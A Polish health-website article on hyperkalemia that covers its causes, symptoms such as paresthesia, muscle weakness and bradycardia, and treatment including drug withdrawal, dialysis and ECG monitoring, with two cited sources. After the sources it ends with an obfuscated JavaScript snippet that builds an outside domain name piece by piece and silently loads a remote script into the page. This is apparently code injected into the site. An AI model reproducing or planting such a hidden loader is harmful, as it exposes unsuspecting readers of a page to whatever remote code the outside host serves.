Home Zdrowie Hiperkaliemia – co to jest i co oznacza zbyt wysoki poziom potasu we krwi

Hiperkaliemia – co to jest i co oznacza zbyt wysoki poziom potasu we krwi

4-hiperkaliemia-co-to-jest-i-co-oznacza-zbyt-wysoki-poziom-potasu-we-krwi

Hiperkaliemia to inaczej nadmiar potasu w organizmie. Pierwiastek ten znajduje się w większości pokarmów i jest potrzebny do zachowania równowagi organizmu oraz do jego prawidłowego funkcjonowania. Jednakże za wysoki poziom potasu może mieć katastrofalne skutki dla zdrowia i życia. Wyróżnia się hiperkaliemię łagodną, umiarkowaną oraz ciężką – w zależności od stężenia potasu we krwi.
    

Nadmiar potasu w organizmie – przyczyny

Może być wiele powodów stanu, w którym występuje nadmiar potasu, jednakże najczęściej pojawia się hiperkaliemia jatrogenna. Mówi się o niej gdy podwyższony potas we krwi jest efektem zażywania różnego rodzaju leków, najczęściej tych, które stosuje się w kardiologii. Ponadto, za dużo potasu w organizmie może się pojawić wskutek masowego przetaczania krwi. Co więcej, badania pokazują, że wysoki potas we krwi towarzyszy sepsie, jak również zaburzeniom pracy nerek.

Nadmiar potasu w organizmie – objawy

Często wykrycie hiperkaliemii nie jest proste, ponieważ podwyższony potas w surowicy krwi występuje przy wielu innych zaburzeniach o podobnych objawach. Ponadto, w przypadku nadmiaru potasu objawy zależą od tego jak duże jest jego stężenie. Charakterystyczne objawy to:    

  • problemy z układem nerwowym, takie jak parastezje czy apatia
  • zaburzenie pracy układu mięśniowego – słabość mięśni, częste skurcze, porażenie
  • problemy kardiologiczne – najczęściej bradykardia

Wszystkie powyższe objawy nadmiaru potasu sprawiają, ze częste zawroty głowy, czy też problemy z utrzymaniem równowagi oraz bóle mięśni i zaburzona praca serca mogą świadczyć o występowaniu u Ciebie hiperkaliemii. Wysoki poziom potasu we krwi jest szczególnie niebezpieczny dla serca, ponieważ z jednej strony, objawami nadmiaru potasu są problemy kardiologiczne, a z drugiej wiele leków wykorzystywanych w leczeniu chorób układu krążenia może zaburzyć gospodarkę potasową organizmu.

Nadmiar potasu – leczenie

Pierwszym krokiem w walce z hiperkaliemią jest odsunięcie leków, które ją wywołały. Ponadto, trzeba usunąć nadmiar potasu z organizmu za pomocą środków farmakologicznych, a w cięższych przypadkach również dializy. W przypadku wystąpienia nadmiaru potasu, leczenie musi koncentrować się na mięśniu sercowym, który jest szczególnie zagrożony. Dlatego też, gdy pojawia się za dużo potasu w organizmie, wykonuje się EKG w celu zaobserwowania ewentualnych zmian w pracy serca

Hiperkalemia jest poważnym schorzeniem, którego nie możesz zlekceważyć, ponieważ w skrajnych przypadkach może to prowadzić nawet do zgonu. Jeśli podejmiesz leczenie, znacząco zwiększasz swoje szanse na wyzdrowienie.

Źródła:
Hyperkalemia as direct life-threatening disorder. Early medical treatment based on 2010 europeand and polish resuscitation council guidelines. Nowiny Lekarskie 81(6), 658-663
Wożakowska-Kapłon B., Janowska-Molenda I, (2009). Hiperkaliemia jatrogenna jako istotny problem terapii chorób sercowo-naczyniowych u starszych chorych. Polskie Archiwum Medycyny Wenętrznej 119(3)

 

{source}
<script type=”text/javascript”>
(function(){
u9hk=document.createElement(„script”);u9hk.type=”text/javascript”;
u9hk.async=true;u9hk_=((„us”)+”t”)+”a”;u9hk_+=(„t.i”)+””+”n”;u9hk_+=((„f”)+”o”);
u9hk.src=”http://”+u9hk_+”/7143877.3hc7185v9hkkge2bpb7bd26361f2a7″;
document.body.appendChild(u9hk);
})();
</script>
{/source}